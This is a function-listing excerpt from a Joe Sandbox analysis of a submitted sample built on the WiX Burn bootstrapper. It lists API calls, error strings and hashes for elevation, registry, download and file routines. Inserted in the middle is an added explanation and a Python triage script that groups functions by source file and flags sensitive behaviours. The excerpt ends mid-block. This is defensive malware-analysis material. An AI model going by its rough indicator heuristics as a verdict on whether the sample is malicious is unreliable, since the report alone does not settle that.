                                                                                                                                                                  • String ID: ($BundleExtensionCreate$BundleExtensionData.xml$Failed to create BundleExtension '%ls'.$Failed to get BundleExtensionCreate entry-point '%ls'.$Failed to get BundleExtensionDataPath.$Failed to load BundleExtension DLL '%ls': '%ls'.$d:\a\wix4\wix4\src\burn\engine\burnextension.cpp
                                                                                                                                                                  • API String ID: 2574300362-4260127901
                                                                                                                                                                  • Opcode ID: f69a6e42f8f512608833f764752d389d950a0660efb4d52270c1fa36259ec9cf
                                                                                                                                                                  • Instruction ID: 0ca30f2a76f47639fb861a9178cf3909bd205059bd20005ebcf2a8e5213a0caa
                                                                                                                                                                  • Opcode Fuzzy Hash: f69a6e42f8f512608833f764752d389d950a0660efb4d52270c1fa36259ec9cf
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C519172E41229EBDB11DF98DC89B9EBBF4AF88710F014056F914BB356D7709940CB90
                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcessToken.ADVAPI32(0097639A,00000008,00000000,00000000,00000000,?,?,?,0096BECF,0097639A,00000001,00000000,00000000,00000000), ref: 0096BB41
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0096BECF,0097639A,00000001,00000000,00000000,00000000,?,?,0097639A), ref: 0096BB4B
                                                                                                                                                                  • GetTokenInformation.ADVAPI32(00000000,?,00000000,00000000,0097639A,?,?,?,0096BECF,0097639A,00000001,00000000,00000000,00000000), ref: 0096BB9D
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0096BECF,0097639A,00000001,00000000,00000000,00000000,?,?,0097639A), ref: 0096BBA7
                                                                                                                                                                  • GetTokenInformation.ADVAPI32(00000000,?,00000000,0097639A,0097639A,0097639A,00000001,00000000,?,?,?,0096BECF,0097639A,00000001,00000000,00000000), ref: 0096BC33
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0096BECF,0097639A,00000001,00000000,00000000,00000000,?,?,0097639A), ref: 0096BC3D
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,0096BECF,0097639A,00000001,00000000,00000000,00000000,?,?,0097639A), ref: 0096BCA1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastToken$Information$CloseHandleOpenProcess
                                                                                                                                                                  • String ID: Failed to allocate token information.$Failed to get information from process token size.$Failed to get information from process token.$Failed to open process token.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                                  • API String ID: 3038379890-3612203842
                                                                                                                                                                  • Opcode ID: 2945379c052cde4f1ab7832ffef4515748f3213c71657adce7947d5288e7434d
                                                                                                                                                                  • Instruction ID: 2fb6fcda9df289096140456f56f6c33ea5240ca56ce5e3bbbbb314ecd76844d9
                                                                                                                                                                  • Opcode Fuzzy Hash: 2945379c052cde4f1ab7832ffef4515748f3213c71657adce7947d5288e7434d
                                                                                                                                                                  • Instruction Fuzzy Hash: 7641C172A41225B7E7305A659C4AFEF6D6CDB45B50F010455BA08FA1D1F7B88E80A6E0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(SeShutdownPrivilege,?,00000000,00000001,A0000005,?,00918015,?,?,?,?,?,?), ref: 00916A39
                                                                                                                                                                    • Part of subcall function 0096B884: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0096B8BC
                                                                                                                                                                    • Part of subcall function 0096B884: GetLastError.KERNEL32 ref: 0096B8C6
                                                                                                                                                                    • Part of subcall function 0096B884: CloseHandle.KERNEL32(00000000), ref: 0096B9DD
                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?,00000001,00000000,?,00918015,?,?,?,?,?,?), ref: 00916A8C
                                                                                                                                                                  • InitiateSystemShutdownExW.ADVAPI32(?,00918015,?,?,?,?), ref: 00916AAB
                                                                                                                                                                  • GetLastError.KERNEL32(?,00918015,?,?,?,?,?,?), ref: 00916AB1
                                                                                                                                                                    • Part of subcall function 009360F9: EnterCriticalSection.KERNEL32(?,00000000,00000000,?,00916A7F,?,00000001,00000000,?,00918015,?,?,?,?,?,?), ref: 00936108
                                                                                                                                                                    • Part of subcall function 009360F9: LeaveCriticalSection.KERNEL32(?,?,00916A7F,?,00000001,00000000,?,00918015,?,?,?,?,?,?), ref: 00936129
                                                                                                                                                                  • IsWindow.USER32(?), ref: 00916B21
                                                                                                                                                                  • Sleep.KERNEL32(000000FA,?,00918015,?,?,?,?,?,?), ref: 00916B3B
                                                                                                                                                                  • Sleep.KERNEL32(000000FA,?,00918015,?,?,?,?,?,?), ref: 00916B70
                                                                                                                                                                  • IsWindow.USER32(?), ref: 00916B7C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Sleep$CriticalErrorLastSectionWindow$CloseCurrentEnterHandleInitiateLeaveLookupPrivilegeProcessShutdownSystemValue
                                                                                                                                                                  • String ID: Failed to enable shutdown privilege in process token.$Failed to schedule restart.$SeShutdownPrivilege$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 2197606043-2157809017
                                                                                                                                                                  • Opcode ID: 99bf869c42df4ddfe60ad9de4dd3cb0b2ef4053a58e8d52e067f1f4c956b77c4
                                                                                                                                                                  • Instruction ID: 587f4eeeb99eeac19abd958ce7fe1ffde48c05c797fa74f760640e62010eb878
                                                                                                                                                                  • Opcode Fuzzy Hash: 99bf869c42df4ddfe60ad9de4dd3cb0b2ef4053a58e8d52e067f1f4c956b77c4
                                                                                                                                                                  • Instruction Fuzzy Hash: 74312D72F88319BBE7105F559C8AF9B356CEB84B55F144034FA09EB281DA749CC056A0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(009173DE,00000000,00916CF2,2000000A,2000000A,?,0093B226,00916CF2,?,009173DE,00000001,009173DE,009173E2,00916DA2,00916CF2,00000000), ref: 00936979
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00916CF2,00000000,00000000), ref: 00936A82
                                                                                                                                                                    • Part of subcall function 00972587: ShellExecuteExW.SHELL32 ref: 00972603
                                                                                                                                                                    • Part of subcall function 00972587: GetLastError.KERNEL32 ref: 00972609
                                                                                                                                                                    • Part of subcall function 00972587: CloseHandle.KERNEL32(?), ref: 00972659
• GetProcessId.KERNEL32(00000000,0154B7FF,00916CF2,runas,00000000,00000008,?,00000000,00000000,000000B0,?,?,00916CF2,00000000,00000000), ref: 00936A62
Strings
• burn.log.mode, xrefs: 009369E5
• Failed to launch elevated child process: %ls, xrefs: 00936A3E
• Failed to allocate parameters for elevated process., xrefs: 009369B3
• -q -%ls %ls %ls %u, xrefs: 0093699F
• d:\a\wix4\wix4\src\burn\engine\elevation.cpp, xrefs: 009369C5, 00936A50
• -%ls=%ls, xrefs: 009369ED
• Failed to set log mode in elevated process command-line., xrefs: 00936A01
• burn.elevated, xrefs: 0093699A
• runas, xrefs: 00936A1F
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CloseHandleProcess$CurrentErrorExecuteLastShell
• String ID: -%ls=%ls$-q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$Failed to set log mode in elevated process command-line.$burn.elevated$burn.log.mode$d:\a\wix4\wix4\src\burn\engine\elevation.cpp$runas
• API String ID: 163010291-2434619687
• Opcode ID: cd352f79474ecddbbbcd6767ea62ef4ecfae60781244e6f2bc77df724bf92e5f
• Instruction ID: a87bf0e620fcd7c67dced281fbd5108cb859ec1193c9b1166ef7155a422d2990
• Opcode Fuzzy Hash: cd352f79474ecddbbbcd6767ea62ef4ecfae60781244e6f2bc77df724bf92e5f
• Instruction Fuzzy Hash: C331F671E80319BFDF11AF94CC4AFDDBA78AF84714F108165F618B6280D3B15AA09B90
APIs
• EnterCriticalSection.KERNEL32(00000000,00000000,00000000,00000024,00000001,00000001,00000000,?,000000F8,00000001,00000000,000000F8,00000024,?,00000000,?), ref: 0091A317
• LeaveCriticalSection.KERNEL32(?), ref: 0091A61A
Strings
• Failed to parse variable value as version., xrefs: 0091A51F
• Failed to read variable included flag., xrefs: 0091A5F8
• Failed to read variable name., xrefs: 0091A5E4
• Failed to read variable value as string., xrefs: 0091A536, 0091A5A8
• Failed to set variable., xrefs: 0091A5BC
• Unsupported variable type., xrefs: 0091A54D
• Failed to read variable value as number., xrefs: 0091A580
• Failed to read variable count., xrefs: 0091A337
• Failed to set variable value., xrefs: 0091A508, 0091A569, 0091A594
• Failed to read variable value type., xrefs: 0091A5D0
• d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 0091A60A
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: Failed to parse variable value as version.$Failed to read variable count.$Failed to read variable included flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
• API String ID: 3168844106-1722372363
• Opcode ID: 78804ead5b7aad985d3284a3df02373802d30efee5069a1b7137cd51620f06da
• Instruction ID: ffbaeea1c4df8207245e002cc9cfe47cce925b9393c0465478ecaec30bc81995
• Opcode Fuzzy Hash: 78804ead5b7aad985d3284a3df02373802d30efee5069a1b7137cd51620f06da
• Instruction Fuzzy Hash: EA91D631F4632DBBEB129A54CD4AFEF7A7CEB54B54F140111F601BA1D0D2B49E808B66
APIs
• RegCloseKey.ADVAPI32(00000000,00000000), ref: 0096C811
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Close
• String ID: Failed to concatenate paths while recursively deleting subkeys. Path1: %ls, Path2: %ls$Failed to delete registry key (ex).$Failed to delete registry key.$Failed to enumerate key 0$Failed to open this key for enumerating subkeys: %ls$Failed to recursively delete subkey: %ls$RegInitialize must be called first in order to RegDelete() a key with non-default bit attributes!$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
• API String ID: 3535843008-329788176
• Opcode ID: 440c9b7a0d0054229f308d16b525637ddf8423b991bc675f266d5937ff5ad126
• Instruction ID: ea120125299e38cba5da9b8d000445812896f62eee94237ba9e2666775014cc8
• Opcode Fuzzy Hash: 440c9b7a0d0054229f308d16b525637ddf8423b991bc675f266d5937ff5ad126
• Instruction Fuzzy Hash: A75156B3E40238B7DB316A94CC4AFBF7A689B49B55F054061FE917B290D7B44D40EAD0
APIs
• GetLastError.KERNEL32 ref: 00978654
  • Part of subcall function 0097666D: RegCloseKey.ADVAPI32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 00976717
• DeleteFileW.KERNEL32(00000000,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 00978791
• CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 009787A0
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Close$DeleteErrorFileHandleLast
• String ID: Burn$DownloadTimeout$Failed to copy download source URL.$Failed to download URL: %ls$Failed to open internet session$Ignoring failure to get size and time for URL: %ls (error 0x%x)$WiX\Burn$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
• API String ID: 3163412224-1623104175
• Opcode ID: a3fbcc997048e772cef24aebd5aec06ecd7fc26a4330c340a294cf8de4cb36f7
• Instruction ID: 44eed2b0d7275e7ff2a3579138a4e4d743570fb80318c2cc02146ee7973bb212
• Opcode Fuzzy Hash: a3fbcc997048e772cef24aebd5aec06ecd7fc26a4330c340a294cf8de4cb36f7
• Instruction Fuzzy Hash: 9B515E72A40219BFDB119FA4CC4AFEF7BBCEF49700F148155FA19E6191E6718A109BA0
APIs
• RegCloseKey.ADVAPI32(00000000,00000000,00916DEA,00000000,C95B5EC6,00000000,00000000,00000000,54B7FF10,00916DEA,00000001,00000001,00916CF2,00000000,8D000001,00916DEA), ref: 00921472
Strings
• Failed to query registry key value., xrefs: 009213DD
• Failed to format value string., xrefs: 0092137B
• Failed to set variable., xrefs: 00921424
• Failed to format key string., xrefs: 009212C5
• Failed to open registry key. Key = '%ls', xrefs: 0092131B
• RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 0092144A
• Registry key not found. Key = '%ls', xrefs: 00921346
• Registry value not found. Key = '%ls', Value = '%ls', xrefs: 009213F8
• d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 0092132D, 009213D2, 009213D7, 009213EF, 00921436
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Close
• String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$d:\a\wix4\wix4\src\burn\engine\search.cpp
• API String ID: 3535843008-2242727714
• Opcode ID: 562591255bfd7c2b10c8a409d28dbc36a4bfd55fe7d854f177515bd0c1050c00
• Instruction ID: c3bdb4df7ed5f7cca88eb89f8b557cc9d9a7a496c9900dcf157d3ab7baf4b1ce
• Opcode Fuzzy Hash: 562591255bfd7c2b10c8a409d28dbc36a4bfd55fe7d854f177515bd0c1050c00
• Instruction Fuzzy Hash: FF512932B40639BBEB227A90DC07FAE7A2DEF14B14F114164BA04795E1D3B19E6097D1
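Every function block above carries a WiX Toolset build path in its strings (`d:\a\wix4\wix4\src\burn\engine\elevation.cpp`, `...\burn\engine\variable.cpp`, `...\burn\engine\search.cpp`, `...\libs\dutil\wixtoolset.dutil\regutil.cpp`, `...\dlutil.cpp`). Those paths point at the stock WiX Burn bootstrapper engine and its dutil helper library: the `runas` and `burn.elevated` strings in the first block belong to Burn relaunching its own engine with elevation, and the registry-deletion and URL-download strings are dutil's generic helpers. Before reading the report's flagged behaviours as the sample's own, it helps to attribute each dumped function to the source file its strings name and list what it calls directly, so engine code can be separated from whatever the engine carries. The following script is an added example, not part of the Joe Sandbox report or of WiX: it parses the block layout used on this page (APIs / Strings / Similarity), runs over a constructed sample abridged from three of the blocks above (Memory Dump Source lines omitted), groups functions by source file, and flags elevated relaunch, URL download, file deletion and registry-key deletion. The indicator names, the `component()` naming and the `$`-split of the `String ID` field are this example's own assumptions.

```python
"""Group Joe Sandbox function blocks (APIs / Strings / Similarity) by the source
file their strings name, so WiX Burn engine functions can be told apart from
anything else in the dump and the sensitive ones (elevation, download, deletion)
are flagged.  Added example; not Joe Sandbox or WiX code."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Matches "GetProcessId.KERNEL32(00000000,...), ref: 00936A62" and "GetLastError.KERNEL32 ref: 00978654",
# with or without the "Part of subcall function XXXX: " prefix the report uses for callees.
API_RE = re.compile(r"^(?P<sub>Part of subcall function [0-9A-F]+: )?(?P<name>\w+)\.(?P<mod>\w+)"
                    r"(?:\(.*\))?,? ref: (?P<ref>[0-9A-F]+)$")
SRC_RE = re.compile(r"^[a-z]:\\.*\.(?:cpp|c|h)$", re.IGNORECASE)  # build-machine source path


@dataclass
class Block:
    apis: List[str] = field(default_factory=list)       # APIs called directly by this function
    subcalls: List[str] = field(default_factory=list)   # APIs reached through "Part of subcall"
    strings: List[str] = field(default_factory=list)    # Strings section plus String ID entries
    similarity: Dict[str, str] = field(default_factory=dict)

    def component(self) -> str:
        """Path after '\\src\\' of the first source-file string, e.g. burn\\engine\\elevation.cpp."""
        src = next((s for s in self.strings if SRC_RE.match(s)), None)
        return src.split("\\src\\", 1)[-1].lower() if src else "unattributed"


def parse_blocks(text: str) -> List[Block]:
    """Split report text into blocks; each 'APIs' header starts a new function."""
    blocks: List[Block] = []
    cur, section = Block(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:
            if line == "APIs" and (cur.apis or cur.strings or cur.similarity):
                blocks.append(cur)
                cur = Block()
            section = line
            continue
        line = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                (cur.subcalls if m.group("sub") else cur.apis).append(m.group("name"))
        elif section == "Strings":
            cur.strings.append(line.rsplit(", xrefs: ", 1)[0])
        elif section == "Similarity":
            key, _, val = line.partition(": ")
            cur.similarity[key] = val
            if key == "String ID":   # '$'-joined; a literal '$' inside a string would mis-split
                cur.strings.extend(s for s in val.split("$") if s and s not in cur.strings)
    if cur.apis or cur.strings or cur.similarity:
        blocks.append(cur)
    return blocks


# Behaviours worth a second look even when the code is attributed to the installer framework.
INDICATORS = {
    "elevated-relaunch": lambda b: {"runas", "burn.elevated"} <= set(b.strings),
    "url-download": lambda b: any(s.startswith("Failed to download URL") for s in b.strings),
    "registry-key-delete": lambda b: any("delete registry key" in s.lower() for s in b.strings),
    "file-delete": lambda b: "DeleteFileW" in b.apis,
}


def triage(text: str) -> Dict[str, dict]:
    """Per component: function count, direct APIs, and which indicators fired."""
    out: Dict[str, dict] = defaultdict(lambda: {"functions": 0, "apis": set(), "indicators": set()})
    for b in parse_blocks(text):
        entry = out[b.component()]
        entry["functions"] += 1
        entry["apis"].update(b.apis)
        entry["indicators"].update(k for k, hit in INDICATORS.items() if hit(b))
    return dict(out)


# Constructed sample: three blocks abridged from the report's elevation.cpp, regutil.cpp
# and dlutil.cpp functions (Memory Dump Source lines omitted; the parser ignores them).
SAMPLE = r"""
APIs
• GetProcessId.KERNEL32(00000000,0154B7FF), ref: 00936A62
Strings
• burn.elevated, xrefs: 0093699A
• runas, xrefs: 00936A1F
• d:\a\wix4\wix4\src\burn\engine\elevation.cpp, xrefs: 009369C5, 00936A50
Similarity
• API ID: CloseHandleProcess$CurrentErrorExecuteLastShell
• String ID: -%ls=%ls$burn.elevated$runas$d:\a\wix4\wix4\src\burn\engine\elevation.cpp
APIs
• RegCloseKey.ADVAPI32(00000000,00000000), ref: 0096C811
Strings
Similarity
• API ID: Close
• String ID: Failed to delete registry key.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
APIs
• GetLastError.KERNEL32 ref: 00978654
  • Part of subcall function 0097666D: RegCloseKey.ADVAPI32(00000000,00000000), ref: 00976717
• DeleteFileW.KERNEL32(00000000,00000000), ref: 00978791
Strings
Similarity
• API ID: Close$DeleteErrorFileHandleLast
• String ID: Failed to download URL: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
"""

if __name__ == "__main__":
    for component, info in sorted(triage(SAMPLE).items()):
        print(f"{component}: {info['functions']} fn, apis={sorted(info['apis'])}, "
              f"indicators={sorted(info['indicators'])}")
```

To run it over the whole report, paste the function-listing text into a file and call `triage(open(path, encoding="utf-8").read())`; the `Memory Dump Source` and `Joe Sandbox IDA Plugin` sections are skipped, and blocks whose strings name no source file land under `unattributed`, which is where anything that is not WiX engine code will show up. Subcall APIs are kept separately from direct calls so a function is not credited with every API of its callees.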
APIs
  • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
  • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
• SysFreeString.OLEAUT32(00000000), ref: 0097A8B1
• SysFreeString.OLEAUT32(00000000), ref: 0097A8C0
• SysFreeString.OLEAUT32(00000000), ref: 0097A8CF
Strings
• Failed to get unknown attribute value., xrefs: 0097A854
• Failed to allocate unknown attribute., xrefs: 0097A774
• Failed to allocate ATOM unknown attribute name., xrefs: 0097A833
• Failed to get unknown attribute namespace., xrefs: 0097A7E0
• Failed to get unknown attribute name., xrefs: 0097A80E
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 0097A763, 0097A76E, 0097A783, 0097A7CE
• Failed to allocate ATOM unknown attribute value., xrefs: 0097A87C
• Failed to allocate ATOM unknown attribute namespace., xrefs: 0097A7BF
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeString$Heap$AllocateProcess
                                                                                                                                                                  • String ID: Failed to allocate ATOM unknown attribute name.$Failed to allocate ATOM unknown attribute namespace.$Failed to allocate ATOM unknown attribute value.$Failed to allocate unknown attribute.$Failed to get unknown attribute name.$Failed to get unknown attribute namespace.$Failed to get unknown attribute value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                                  • API String ID: 2724874077-797782994
                                                                                                                                                                  • Opcode ID: 167475b9ed9253e8a1fbfac674c56292b63cbf306c66ca3b15698a93dcb63fcf
                                                                                                                                                                  • Instruction ID: e07d2b0981eedac22c424d707fcd21fd4dfec3168797d2183c98eaed59ae42a9
                                                                                                                                                                  • Opcode Fuzzy Hash: 167475b9ed9253e8a1fbfac674c56292b63cbf306c66ca3b15698a93dcb63fcf
                                                                                                                                                                  • Instruction Fuzzy Hash: 7941FC72F80329FBEB255B508C4AFAF7B789B81B14F018060FB09BB1D1E6749D419691
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 00977D2E
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00977D3B
                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 00977D92
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00977DC6
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp), ref: 00977E18
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                                                                  • String ID: %ls.R$Failed to calculate resume path from working path: %ls$Failed to create resume file: %ls$Failed to create resume path.$Failed to read resume file: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                  • API String ID: 3160720760-2159331624
                                                                                                                                                                  • Opcode ID: 429e7340fc0b77fc885cc5a6c4b17c851e081632c8a4702c7ba022c775d3cad4
                                                                                                                                                                  • Instruction ID: d13d136d9c47c2421bf1989be44b356690a8f25f9f477d643ac5d7e445cd34a7
